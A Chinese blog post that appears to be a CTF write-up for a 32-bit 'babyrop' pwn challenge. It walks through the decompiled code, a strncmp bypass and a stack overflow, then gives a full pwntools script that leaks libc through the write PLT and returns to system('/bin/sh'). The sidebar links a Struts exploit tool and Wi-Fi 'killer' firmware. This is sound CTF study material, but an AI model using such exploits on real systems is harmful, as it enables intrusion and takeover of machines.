测试一道pwn题_多漏洞组合-堆栈格式化

最新推荐文章于 2022-08-02 01:37:15 发布
最新推荐文章于 2022-08-02 01:37:15 发布
阅读量416 收藏 1
点赞数
分类专栏: 赛事复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/104050218
版权
checksec机制和file信息
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

./babyrop: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter 
/lib/ld-, for GNU/Linux 2.6.32, BuildID[sha1]=6503b3ef34c8d55c8d3e861fb4de2110d0f9f8e2, stripped
运行
直接让输入字符串~
IDA分析
ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h] 231

  if ( a1 == 127 )
    result = read(0, &buf, 0xC8u);              // 200
  else
    result = read(0, &buf, a1);                 // a1  可以控制  
  return result;
}

这个漏洞点,我可以看了好久,自己也没遇见过,下次长记性了,这是利用返回数字去扩大了栈的输入字节数。

int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h]
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  sub_80486BB();
  fd = open("/dev/urandom", 0);
  if ( fd > 0 )
    read(fd, &buf, 4u);
  v2 = sub_804871F(buf);
  sub_80487D0(v2);
  return 0;
}

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch] 44
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1);
  v6 = read(0, buf, 0x20u);                     // 32
  buf[v6 - 1] = 0;
  v1 = strlen(buf);
  if ( strncmp(buf, &s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);
  return v5;   #这里的v5就是a1  这里return后 将返回值赋值给了下一个函数
}

现在需要确定的就是我们是否可以将v5覆盖成一个比较大的数字

-0000002D                 db ? ; undefined
-0000002C buf             db ?				|   #数据是从上面往下面传入的
-0000002B                 db ? ; undefined		|
-0000002A                 db ? ; undefined		|
-00000029                 db ? ; undefined		|
-00000028                 db ? ; undefined	<-------
-00000027                 db ? ; undefined
-00000026                 db ? ; undefined
-00000025 var_25          db ? 				 #v5
-00000024                 db ? ; undefined
-00000023                 db ? ; undefined
-00000022                 db ? ; undefined
-00000021                 db ? ; undefined
-00000020                 db ? ; undefined
-0000001F                 db ? ; undefined
简单分析
  1. 注意点:在IDA查看到内存数据 dd db dw 利用D可以转换类型 不同数据类型之间的字节数不同,会造成填充数据的时候size确定问题。
  2. 0x2c-0x25 = 0x7 ,填充0x7个数据然后填充"\xff" 扩大数据size,这里我们使用onegadget,所以不需要将padding的大小设置的太大。
  3. 这里还需要知道的就是libc_base 因为开启了Full RELRO 利用got表复写术,write就是很好的一个泄露函数,“alarm”也称闹钟函数。
  4. 这里先补充一点数据在got表复写数据存放的先后顺序
往栈里面压入的顺序 如下
size #大小
buf #buf的位置
1 #文件描述符
@PLT
EXP

脚本中有onegadget 也有systen("/bin/sh"),分开去看

#!/usr/bin/env python
#coding=utf8 
from pwn import* 
context.log_level = 'debug' 
context.terminal =['gnome-terminal','-x','bash','-c'] 
p = process("./babyrop.babyrop")
libc = ELF("libc.so.6")  
libc = ELF("libc-2.23.so")
elf = ELF("./babyrop.babyrop")

libc_base = 0xf7e05000
one_gadget_offset = 0x3a80e

gadget_addr = libc_base + one_gadget_offset
print("[+]---->gadget_addr = ") + hex(gadget_addr)
#gdb.attach(p,"b* "+ "0x804871F")
payload = "\x00"*7 + "\xff"  #
p.sendline(payload)

payload1 = "A"*0Xe7 + "B"*4 + p32(elf.plt['write'])+p32(0x80487D0)+p32(1)+p32(elf.got['alarm'])+p32(4)
p.recvline("Correct\n") 
#gdb.attach(p)
p.sendline(payload1)

write_addr = u32(p.recv(4))
libc_base = write_addr - libc.symbols['alarm']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + libc.search('/bin/sh').next()

print ("[+]---->write_addr = ") +hex(write_addr)
print ("[+]---->libc_base = ") +hex(libc_base)
print ("[+]---->system_addr = ") +hex(system_addr)
print ("[+]---->bin_sh_addr = ") +hex(bin_sh_addr)
print ("[+]---->write_plt = ") +hex(elf.plt['write'])
print ("[+]---->write_got = ") +hex(elf.got['write'])
#p.recv()
#gdb.attach(p)
payload2 = "A"*0Xe7 + "B"*4 + p32(system_addr)+p32(0)+p32(bin_sh_addr)
p.sendline(payload2)
p.interactive()
Jc^
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF pwn格式化字符串漏洞详解
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
PWN基础知识及基础栈溢出手法
山高路远
04-12 3898
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
PWN测试
07-18
信息安全PWN测试目:用于CTF的练习与PWN的学习,测试目。
pwnable 目解析:[Toddler's Bottle]-lotto 逻辑漏洞
个人笔记
02-27 342
0x10 目描述 Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 本pwnable 中的入门级试,代码本身不含漏洞,而是逻辑问。时至今日,很多传统的堆栈溢出漏洞不再那么容易找到,而那些设计问或者代码中的逻辑问,往往...
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2202
通过PWN5一尝试理解格式化字符串漏洞
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
Out_of_Hand__Attacks_Against_PHP_Environments-Powerful_PHP_Pwn_Primitives.pdf
08-08
当前web应用漏洞变得越来越复杂。对于这些流行网站和应用所用到的底层编程语言和框架的理解程度,对是否能够发现高危漏洞起到重要作用。本议中,将会深入探讨PHP 7.4的一些最新feature,以及如何利用这些feature去...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
2020全国工业互联网安全技术技能大赛
10-28
含有misc,re,crypto,pwn目说明
一次不用脚本的pwn
蚁景网安学院
03-03 738
0x01:前言我们在 ctf 中 ,更多的是在 web方向中会 使用到 linux 中的/proc 目录,这里将对它进行一次介绍与学习,并且最后再举一次pwn中 运用到它的一次实例记录....
2019蓝帽杯_多漏洞组合-堆栈格式化
Jc
01-20 372
文件安全机制 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) file信息 ./pwn: ELF 64-bit LSB executable, x86-6...
4-ReeHY-main-100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列22
重新启程
12-26 642
目地址:4-ReeHY-main-100 本是高手进阶区的第11,已经逐步稳定在5颗星的难度级别了。 废话不说,看看目先 照例检查一下保护机制: [*] '/ctf/work/python/4-ReeHY-main-100/4-ReeHY-main' Arch: amd64-64-little RELRO: Partial RELRO Sta...
pwn-堆溢出off-by-one
CharlesGodX的博客
04-17 1804
Thunder_J@Thunder_J-virtual-machine:~/桌面$ python exp.py [+] Starting local process './Storm_note': pid 16030 [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/Storm_note' Arch: amd64-64-little ...
django views.py接收json数据
whskdnx的博客
05-14 949
from django.shortcuts import HttpResponse from json_data.models import HaDevices from django.db import connection import json from json_data import mqtt_client import paho.mqtt.client as mqtt import t...
利用/dev/urandom文件创建随机数
wu_cai_的专栏
05-13 3914
1:/dev/urandom和/dev/random是什么   这两个文件记录Linux下的熵池,所谓熵池就是当前系统下的环境噪音,描述了一个系统的混乱程度,环境噪音由这几个方面组成,如内存的使用,文件的使用量,不同类型的进程数量等等,刚开机的时候系统噪音会较小。在这两个设备的差异在于:/dev/random的random pool依赖于系统中断,因此在系统的中断数不足时,/dev/random...
BUUCTF-PWN记录25(IO file attack)
weixin_44145820的博客
08-14 1504
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
pwn格式化字符串漏洞
最新发布
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值